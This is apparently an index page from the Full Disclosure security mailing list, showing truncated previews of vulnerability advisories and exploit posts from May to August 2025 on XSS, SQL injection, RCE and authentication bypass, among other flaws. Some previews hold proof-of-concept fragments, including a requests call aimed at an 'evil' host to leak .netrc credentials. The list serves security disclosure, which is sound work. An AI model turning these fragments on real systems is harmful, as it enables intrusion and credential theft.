[FD] Defense in depth -- the Microsoft way (part 91): yet another 30 year old bug of the "Properties" shell extension

2025-08-04 Thread Stefan Kanthak via Fulldisclosure
Hi @ll, this extends the previous post titled Defense in depth -- the Microsoft way (part 90): "Digital Signature" property sheet missing without "Read Extended Attributes" access permission , to document another facet of this 30 year old bug in t

[FD] Rtpengine: RTP Inject and RTP Bleed vulnerabilities despite proper configuration (CVSS v4.0 Score: 9.3 / Critical)

2025-08-02 Thread Sandro Gauci via Fulldisclosure
Rtpengine: RTP Inject and RTP Bleed vulnerabilities despite proper configuration (CVSS v4.0 Score: 9.3 / Critical) - CVSS v4.0 - Exploitability: High - Complexity: Low - Vulnerable system: Medium - Subsequent system: Medium - Exploitation: High - Security requirements: Hig

[FD] APPLE-SA-07-30-2025-1 Safari 18.6

2025-08-02 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-30-2025-1 Safari 18.6 Safari 18.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124152. Apple maintains a Security Releases page at https://support.apple.com/100100

[FD] Defense in depth -- the Microsoft way (part 90): "Digital Signature" property sheet missing without "Read Extended Attributes" access permission

2025-07-29 Thread Stefan Kanthak via Fulldisclosure
Hi @ll, about 35 years ago Microsoft began to implement their "New Technology File System" (NTFS) for their upcoming Windows NT operating system. NTFS supports the extended attributes of the HPFS file system which Microsoft and IBM had developed for their OS/2 operating system before. NTFS' initia

[FD] St. Pölten UAS 20250721-0 | Multiple Vulnerabilities in Helmholz Industrial Router REX100 / mbNET.mini

2025-07-29 Thread Thomas Weber | CyberDanube via Fulldisclosure
St. Pölten UAS 20250721-0 | title: Multiple Vulnerabilities in REX100 | product: Helmholz Industrial Router REX100 / mbNET.mini | vulnerable version: < 2.3.3 | fixed version: 2.3.3

[FD] APPLE-SA-07-29-2025-8 visionOS 2.6

2025-07-29 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-8 visionOS 2.6 visionOS 2.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124154. Apple maintains a Security Releases page at https://support.apple.com/1001

[FD] APPLE-SA-07-29-2025-7 tvOS 18.6

2025-07-29 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-7 tvOS 18.6 tvOS 18.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124153. Apple maintains a Security Releases page at https://support.apple.com/100100 whi

[FD] APPLE-SA-07-29-2025-6 watchOS 11.6

2025-07-29 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-6 watchOS 11.6 watchOS 11.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124155. Apple maintains a Security Releases page at https://support.apple.com/1001

[FD] APPLE-SA-07-29-2025-5 macOS Ventura 13.7.7

2025-07-29 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-5 macOS Ventura 13.7.7 macOS Ventura 13.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/124151. Apple maintains a Security Releases page at https://suppor

[FD] APPLE-SA-07-29-2025-4 macOS Sonoma 14.7.7

2025-07-29 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-4 macOS Sonoma 14.7.7 macOS Sonoma 14.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/124150. Apple maintains a Security Releases page at https://support.

[FD] APPLE-SA-07-29-2025-3 macOS Sequoia 15.6

2025-07-29 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-3 macOS Sequoia 15.6 macOS Sequoia 15.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124149. Apple maintains a Security Releases page at https://support.ap

[FD] APPLE-SA-07-29-2025-2 iPadOS 17.7.9

2025-07-29 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-2 iPadOS 17.7.9 iPadOS 17.7.9 addresses the following issues. Information about the security content is also available at https://support.apple.com/124148. Apple maintains a Security Releases page at https://support.apple.com/10

[FD] APPLE-SA-07-29-2025-1 iOS 18.6 and iPadOS 18.6

2025-07-29 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-1 iOS 18.6 and iPadOS 18.6 iOS 18.6 and iPadOS 18.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124147. Apple maintains a Security Releases page at https:

[FD] Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability

2025-07-29 Thread Egidio Romano
Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability [-] Software Link: https://invisioncommunity.com [-] Affected V

[FD] CVE-2025-52187 – Stored XSS in School Management System (PHP/MySQL)

2025-07-29 Thread Sanjay Singh
Hello Full Disclosure community, I’m sharing details of a recently assigned CVE affecting a widely used open-source School Management System (PHP/MySQL). CVE ID: CVE-2025-52187 Vulnerability Type: Stored Cross-Site Scripting (XSS) Attack Vector: Remote

[FD] Invision Community <= 5.0.7 (oauth/callback) Reflected Cross-Site Scripting Vulnerability

2025-07-29 Thread Egidio Romano
- Invision Community <= 5.0.7 (oauth/callback) Reflected Cross-Site Scripting Vulnerability - [-] Software Link: https:/

Re: [FD] Multiple vulnerabilities in the web management interface of Intelbras routers

2025-07-29 Thread Palula Brasil
The following snippet in the text is associated to the wrong CVE number: 2.2 Possibility of injecting JavaScript code into the name of the visiting network (XSS) - CVE-2025-26064 The correct CVE number for item 2.2 is CVE-2025-26065. On Sun, Jul 20, 2025 at 3:22 AM Gabriel Augusto Vaz de Lima via

[FD] Stored XSS "Edit General Info" Functionality - seotoasterv2.5.0

2025-07-29 Thread Andrey Stoykov
# Exploit Title: Stored XSS "Edit General Info" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Edit General Info" Functionality #3: Steps to Reproduce 1. Login with adm

[FD] Stored XSS "Create Page" Functionality - seotoasterv2.5.0

2025-07-29 Thread Andrey Stoykov
# Exploit Title: Stored XSS "Create Page" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Create Page" Functionality #1: Steps to Reproduce 1. Login with admin and visit

[FD] Open Redirect "Login Page" Functionality - seotoasterv2.5.0

2025-07-29 Thread Andrey Stoykov
# Exploit Title: Open Redirect "Login Page" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Open Redirect "Login Page" Functionality #1: Steps to Reproduce Login to the application

[FD] Stored XSS "Edit Header" Functionality - seotoasterv2.5.0

2025-07-29 Thread Andrey Stoykov
# Exploit Title: Stored XSS "Edit Header" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Edit Header" Functionality #1: Steps to Reproduce: Login as admin user and vis

[FD] [KIS-2025-04] SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Vulnerability

2025-07-29 Thread Egidio Romano
-- SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Vulnerability -- [-] Software Link: https://www.sugarcrm.com [-] Affected Versions: All commercial versions b

[FD] AK-Nord USB-Server-LXL privilege escalation and code execution (CVE-2025-52361)

2025-07-29 Thread Marcus Krueppel
== Overview == TL;DR: Using the low-privilege "admin" user account via SSH on the IoT device "USB-Server-LXL" [1], it is possible to modify the script /etc/init.d/lighttpd which is executed by root upon restart, leading to arbitrary code execution with root privil

[FD] KL-001-2025-016: Xorux LPAR2RRD File Upload Directory Traversal

2025-07-28 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-016: Xorux LPAR2RRD File Upload Directory Traversal Title: Xorux LPAR2RRD File Upload Directory Traversal Advisory ID: KL-001-2025-016 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-016.txt 1. Vulnerability Details Affected

[FD] KL-001-2025-015: Xorux LPAR2RRD Read Only User Log Download Exposing Sensitive Information

2025-07-28 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-015: Xorux LPAR2RRD Read Only User Log Download Exposing Sensitive Information Title: Xorux LPAR2RRD Read Only User Log Download Exposing Sensitive Information Advisory ID: KL-001-2025-015 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001

[FD] KL-001-2025-014: Xorux LPAR2RRD Read Only User Denial of Service

2025-07-28 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-014: Xorux LPAR2RRD Read Only User Denial of Service Title: Xorux LPAR2RRD Read Only User Denial of Service Advisory ID: KL-001-2025-014 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-014.txt 1. Vulnerability Details Affect

[FD] KL-001-2025-013: Xorux XorMon-NG Web Application Privilege Escalation to Administrator

2025-07-28 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-013: Xorux XorMon-NG Web Application Privilege Escalation to Administrator Title: Xorux XorMon-NG Web Application Privilege Escalation to Administrator Advisory ID: KL-001-2025-013 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-01

[FD] KL-001-2025-012: Xorux XorMon-NG Read Only User Export Device Configuration Exposing Sensitive Information

2025-07-28 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-012: Xorux XorMon-NG Read Only User Export Device Configuration Exposing Sensitive Information Title: Xorux XorMon-NG Read Only User Export Device Configuration Exposing Sensitive Information Advisory ID: KL-001-2025-012 Publication Date: 2025-07-28 Publication URL: https://korelogi

[FD] Multiple vulnerabilities in the web management interface of Intelbras routers

2025-07-19 Thread Gabriel Augusto Vaz de Lima via Fulldisclosure
=[Tempest Security Intelligence]== Multiple vulnerabilities in the web management interface of Intelbras routers Author: Gabriel Lima =[Table of Contents]== 1. Overview 2. Detailed description

[FD] Missing Critical Security Headers in OpenBlow

2025-07-12 Thread Tifa Lockhart via Fulldisclosure
Advisory ID: OPENBLOW-2025-003 Title: Missing Critical Security Headers in OpenBlow Date: 2025-07-12 Vendor: OpenBlow (openblow.it) Severity: High CVSS v3.1 Base Score: 8.2 (High) Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N Summary: Multiple public deployments of the OpenBlow whistleblowing soft

[FD] SAP NetWeaver S/4HANA - ABAP Code Execution via Internal Function

2025-07-11 Thread Office nullFaktor GmbH
nullFaktor Security Advisory < 20250719 > === Title: ABAP Code Execution via Internal Function Module WRITE_AND_CALL_DBPROG Vulnerability: Exposed Dangerous Functionality Product: SAP NetWeaver S

[FD] Tiki Wiki CMS Groupware <= 28.3 Two Server-Side Template Injection Vulnerabilities

2025-07-09 Thread Egidio Romano
-- Tiki Wiki CMS Groupware <= 28.3 Two Server-Side Template Injection Vulnerabilities -- [-] Software Link: https://tiki.org [-] Affec

[FD] KL-001-2025-011: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery

2025-07-09 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-011: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery Title: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery Advisory ID: KL-001-2025-011 Publication Date: 2025-07-09 Publication URL: ht

[FD] KL-001-2025-010: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation

2025-07-09 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-010: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation Title: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation Advisory ID: KL-001-2025-010 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories/KL-001

[FD] KL-001-2025-009: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution

2025-07-09 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-009: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution Title: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution Advisory ID: KL-001-2025-009 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisori

[FD] KL-001-2025-008: Schneider Electric EcoStruxure IT Data Center Expert Root Password Discovery

2025-07-09 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-008: Schneider Electric EcoStruxure IT Data Center Expert Root Password Discovery Title: Schneider Electric EcoStruxure IT Data Center Expert Root Password Discovery Advisory ID: KL-001-2025-008 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories

[FD] KL-001-2025-007: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution

2025-07-09 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-007: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution Title: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution Advisory ID: KL-001-2025-007 Publication Date: 2025-07-09 Publication URL: https://korelo

[FD] KL-001-2025-006: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection

2025-07-09 Thread KoreLogic Disclosures via Fulldisclosure
KL-001-2025-006: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection Title: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection Advisory ID: KL-001-2025-006 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Reso

[FD] eSIM security research (GSMA eUICC compromise and certificate theft)

2025-07-09 Thread Security Explorations
Dear All, We broke security of Kigen eUICC card with GSMA consumer certificates installed into it. The eUICC card makes it possible to install the so called eSIM profiles into target chip. eSIM profiles are software representations of mobile subscriptions. For many years such mobile subscriptions

[FD] Directory Traversal "Site Title" - bluditv3.16.2

2025-07-07 Thread Andrey Stoykov
# Exploit Title: Directory Traversal "Site Title" - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Directory Traversal "Site Title" #1: Steps to Reproduce: 1. Login with admin account and "General"

[FD] XSS via SVG File Upload - bluditv3.16.2

2025-07-07 Thread Andrey Stoykov
# Exploit Title: XSS via SVG File Upload - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ XSS via SVG File Upload #1: Steps to Reproduce: 1. Login with admin account and click on "General" > "Logo"

[FD] Stored XSS "Add New Content" Functionality - bluditv3.16.2

2025-07-07 Thread Andrey Stoykov
# Exploit Title: Stored XSS "Add New Content" Functionality - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Add New Content" Functionality #1: Steps to Reproduce: 1. Login with admin a

[FD] Session Fixation - bluditv3.16.2

2025-07-07 Thread Andrey Stoykov
# Exploit Title: Session Fixation - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Session Fixation #1: Steps to Reproduce: Visit the login page. Login with valid user and observe that the sessionI

[FD] Remote DoS in httpx 1.7.0 – Out-of-Bounds Read via Malformed Tag

2025-06-25 Thread Brian Carpenter via Fulldisclosure
Hey list, You can remotely crash httpx v1.7.0 (by ProjectDiscovery) by serving a malformed tag on your website. The bug is a classic out-of-bounds read in trimTitleTags() due to a missing bounds check when slicing the title string. It panics with: panic: runtime error: slice bounds out of ran

[FD] CVE-2025-32975 - Quest KACE SMA Authentication Bypass

2025-06-25 Thread Seralys Research Team via Fulldisclosure
Seralys Security Advisory | https://www.seralys.com/research == Title: Authentication Bypass Product: Quest KACE Systems Management Appliance (SMA) Affected: Confirmed on 14.1 (older versions likely affected) Fix

[FD] CVE-2025-32977 - Quest KACE Unauthenticated Backup Upload

2025-06-24 Thread Seralys Research Team via Fulldisclosure
Seralys Security Advisory | https://www.seralys.com/research == Title: Unauthenticated Backup Upload Product: Quest KACE Systems Management Appliance (SMA) Affected: Confirmed on 14.1 (older versions likely affec

[FD] RansomLord (NG v1.0) anti-ransomware exploit tool

2025-06-24 Thread malvuln
First official NG versioned release with significant updates, fixes and new features https://github.com/malvuln/RansomLord/releases/tag/v1.0 RansomLord (NG) v1.0 Anti-Ransomware exploit tool. Proof-of-concept tool that automates the creation of PE files, used to exploit ransomware pre-encryption.

[FD] CVE-2025-32978 - Quest KACE SMA Unauthenticated License Replacement

2025-06-23 Thread Seralys Research Team via Fulldisclosure
Seralys Security Advisory | https://www.seralys.com/research == Title: Unauthenticated License Replacement Product: Quest KACE Systems Management Appliance (SMA) Affected: Confirmed on 14.1 (older versions likely

[FD] CVE-2025-32976 - Quest KACE SMA 2FA Bypass

2025-06-23 Thread Seralys Research Team via Fulldisclosure
Seralys Security Advisory | https://www.seralys.com/research == Title: 2FA Bypass Product: Quest KACE Systems Management Appliance (SMA) Affected: Confirmed on 14.1 (older versions likely affected) Fixed in: 1

[FD] Disclosure Yealink Cloud vulnerabilities

2025-06-23 Thread Jeroen Hermans via Fulldisclosure
Dear all, ---Abstract--- Yealink RPS contains several vulnerabilities that can lead to leaking of PII and/or MITM attacks. Some vulnerabilities are unpatched even after disclosure to the manufacturer. ---/Abstract--- We are Stefan Gloor and Jeroen Hermans. We are independent computer securit

[FD] SEC Consult SA-20250611-0 :: Undocumented Root Shell Access on SIMCom SIM7600G Modem

2025-06-17 Thread SEC Consult Vulnerability Lab via Fulldisclosure
SEC Consult Vulnerability Lab Security Advisory < 20250611-0 > === title: Undocumented Root Shell Access product: SIMCom - SIM7600G Modem vulnerable version: Firmware Revision: LE20B03SIM7600M21-A

[FD] Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain → Secure Enclave Key Theft, Wormable RCE, Crypto Theft

2025-06-09 Thread josephgoyd via Fulldisclosure
Hello Full Disclosure, This is a strategic public disclosure of a zero-click iMessage exploit chain that was discovered live on iOS 18.2 and remained unpatched through iOS 18.4. It enabled Secure Enclave key theft, wormable remote code execution, and undetectable crypto wallet exfiltration. Des

[FD] Defense in depth -- the Microsoft way (part 89): user group policies don't deserve tamper protection

2025-06-03 Thread Stefan Kanthak
Hi @ll, user group policies are stored in DACL-protected registry keys [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies] respectively [HKEY_CURRENT_USER\Software\Policies] and below, where only the SYSTEM account and members of the "Administrators" user group are granted write

[FD] CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0

2025-06-03 Thread Sanjay Singh
Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project: CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 --

[FD] ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page

2025-06-03 Thread Ron E
An authenticated attacker can inject JavaScript into the bio field of their user profile. When the profile is viewed by another user, the injected script executes. *Proof of Concept:* POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: --host-- profile_in

[FD] ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path

2025-06-03 Thread Ron E
An authenticated user can inject malicious JavaScript into the user_image field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient sanitization, allowing stored script execution in the context of other authenticated users. *Pro

[FD] Local information disclosure in apport and systemd-coredump

2025-06-03 Thread Qualys Security Advisory via Fulldisclosure
rash_to_container( 510 options: argparse.Namespace, coredump_fd: int = 0, has_cap_sys_admin: bool = True 511 ) -> None: ... 521 proc_host_pid_fd = os.open( 522 f"/proc/{options.global_pid}", os.O_RDONLY | os.O_PATH | os.O_DIRECTORY 523 ) ... 531 sock_fd

[FD] Stored XSS via File Upload - adaptcmsv3.0.3

2025-06-03 Thread Andrey Stoykov
# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS via File Upload #1: Steps to Reproduce: 1. Login with low privilege user and visit "Profile"

[FD] IDOR "Change Password" Functionality - adaptcmsv3.0.3

2025-06-03 Thread Andrey Stoykov
# Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ IDOR "Change Password" Functionality #1: Steps to Reproduce: 1. Login as user with low privile

[FD] Stored XSS "Send Message" Functionality - adaptcmsv3.0.3

2025-06-03 Thread Andrey Stoykov
# Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Send Message" Functionality #1: Steps to Reproduce: 1. Login as normal user and

[FD] Authenticated File Upload to RCE - adaptcmsv3.0.3

2025-06-03 Thread Andrey Stoykov
# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE #1: Steps to Reproduce: 1. Login as admin user and visit "System"

[FD] Stored XSS in "Description" Functionality - cubecartv6.5.9

2025-06-03 Thread Andrey Stoykov
# Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9 # Date: 05/2025 # Exploit Author: Andrey Stoykov # Version: 6.5.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Visit "Account" > "Address Book" and choose "Edit"

[FD] Multiple Vulnerabilities in SAP GuiXT Scripting

2025-06-03 Thread Michał Majchrowicz via Fulldisclosure
Security Advisory Vulnerabilities reported to vendor: March 13, 2025 Vendor requested additional information: March 20, 2025 Additional information provided to vendor: March 22, 2025 Vendor confirmed the reported issues but rejected them: March 31, 2025 Additional information provided to vendor: M

[FD] CVE-2024-47081: Netrc credential leak in PSF requests library

2025-06-03 Thread Juho Forsén via Fulldisclosure
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get('http://example.com:@evi

[FD] Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)

2025-06-03 Thread Housma mardini
Hi, I am submitting an exploit for *CVE-2019-9978*, a remote code execution vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2). *Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) *Date*: 2025-05-20 *Exploit Author*: Huseyin M

[FD] Youpot honeypot

2025-06-03 Thread Jacek Lipkowski via Fulldisclosure
Hi, I made a novel honeypot for worms called Youpot. Normally a honeypot will try to implement whatever service it thinks the attacker would like. For a high interaction or pure honeypot this is often impossible, because of the thousands of possibilities. Even a simple telnet server will have

[FD] SEC Consult SA-20250521-0 :: Multiple Vulnerabilities in eCharge Hardy Barth cPH2 and cPP2 charging stations

2025-05-27 Thread SEC Consult Vulnerability Lab via Fulldisclosure
SEC Consult Vulnerability Lab Security Advisory < 20250521-0 > === title: Multiple Vulnerabilities product: eCharge Hardy Barth cPH2 and cPP2 charging stations vulnerable version: 2.2.0 fixed versi

[FD] Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework

2025-05-27 Thread Ron E
An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressi

[FD] SEC Consult SA-20250506-0 :: Honeywell MB Secure Authenticated Command Injection

2025-05-16 Thread SEC Consult Vulnerability Lab via Fulldisclosure
SEC Consult Vulnerability Lab Security Advisory < 20250507-0 > === title: Authenticated Command Injection product: Honeywell MB-Secure vulnerable version: MB-Secure versions from V11.04 and prior to V12.5

[FD] Unauthenticated Blind SQL Injection | RSI queue management system - V 3.0 | CVE-2025-26086

2025-05-16 Thread Shaikh Shahnawaz
[+] Credits: Shahnawaz Shaikh, Security Researcher at Cybergate Defense LLC [+] twitter.com/_striv3r_ [Vendor of Product] RSI Queue (https://www.rsiqueue.com/) [Vulnerability Type] Blind SQL Injection [Affected Component] The vulnerable component is the TaskID parameter in the get request. [CVE

[FD] CVE-2025-30072 Tiiwee X1 Alarm System - Authentication Bypass by Capture-replay

2025-05-16 Thread Sebastian Auwärter via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2025-006 Product: Tiiwee X1 Alarm System Manufacturer: Tiiwee B.V. Affected Version(s): TWX1HAKV2 Tested Version(s): TWX1HAKV2 Vulnerability Type: Authentication Bypa

[FD] SEC Consult SA-20250422-0:: Local Privilege Escalation via DLL Search Order Hijacking

2025-05-16 Thread SEC Consult Vulnerability Lab via Fulldisclosure
SEC Consult Vulnerability Lab Security Advisory < 20250422-0 > === title: Local Privilege Escalation via DLL Search Order Hijacking product: Ivanti Endpoint Manager Security Scan (Vulscan) Self Update vu

[FD] SEC Consult SA-20250429-0 :: Multiple Vulnerabilities in HP Wolf Security Controller and more

2025-05-16 Thread SEC Consult Vulnerability Lab via Fulldisclosure
SEC Consult Vulnerability Lab Security Advisory < publishing date 20250429-0 > Combined Security Advisory for Sure Access Enterprise and Sure Click Enterprise === title: Multiple Vulnerabilities product:

[FD] Session Invalidation in Economizzer Allows Unauthorized Access After Logout

2025-05-16 Thread Ron E
A session management vulnerability exists in gugoan's Economizzer v.0.9-beta1. The application fails to properly invalidate user sessions upon logout or other session termination events. As a result, a valid session remains active and usable even after the user has attempted to log out. POST /we

[FD] Persistent Cross-Site Scripting in Economizzer Category Entry

2025-05-16 Thread Ron E
A persistent cross-site scripting (XSS) vulnerability exists in gugoan's Economizzer v.0.9-beta1. The application fails to properly sanitize user-supplied input when creating a new category via the *category/create *endpoint. An attacker can inject malicious JavaScript payloads that are permanently

[FD] Persistent Cross-Site Scripting in Economizzer Cashbook Entry

2025-05-16 Thread Ron E
A persistent cross-site scripting (XSS) vulnerability exists in gugoan's Economizzer v.0.9-beta1 The application fails to properly sanitize user-supplied input when creating a new cash book entry via the *cashbook/create* endpoint. An attacker can inject malicious JavaScript payloads that are perma

[FD] APPLE-SA-05-12-2025-9 Safari 18.5

2025-05-16 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-9 Safari 18.5 Safari 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122719. Apple maintains a Security Releases page at https://support.apple.com/100100

[FD] APPLE-SA-05-12-2025-8 visionOS 2.5

2025-05-16 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-8 visionOS 2.5 visionOS 2.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122721. Apple maintains a Security Releases page at https://support.apple.com/1001

[FD] APPLE-SA-05-12-2025-7 tvOS 18.5

2025-05-16 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-7 tvOS 18.5 tvOS 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122720. Apple maintains a Security Releases page at https://support.apple.com/100100 whi

[FD] APPLE-SA-05-12-2025-6 watchOS 11.5

2025-05-16 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-6 watchOS 11.5 watchOS 11.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122722. Apple maintains a Security Releases page at https://support.apple.com/1001

[FD] APPLE-SA-05-12-2025-5 macOS Ventura 13.7.6

2025-05-16 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-5 macOS Ventura 13.7.6 macOS Ventura 13.7.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/122718. Apple maintains a Security Releases page at https://suppor

[FD] APPLE-SA-05-12-2025-4 macOS Sonoma 14.7.6

2025-05-16 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-4 macOS Sonoma 14.7.6 macOS Sonoma 14.7.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/122717. Apple maintains a Security Releases page at https://support.

[FD] APPLE-SA-05-12-2025-3 macOS Sequoia 15.5

2025-05-16 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-05-12-2025-3 macOS Sequoia 15.5 macOS Sequoia 15.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122716. Apple maintains a Security Releases page at https://support.ap

[FD] APPLE-SA-05-12-2025-2 iPadOS 17.7.7

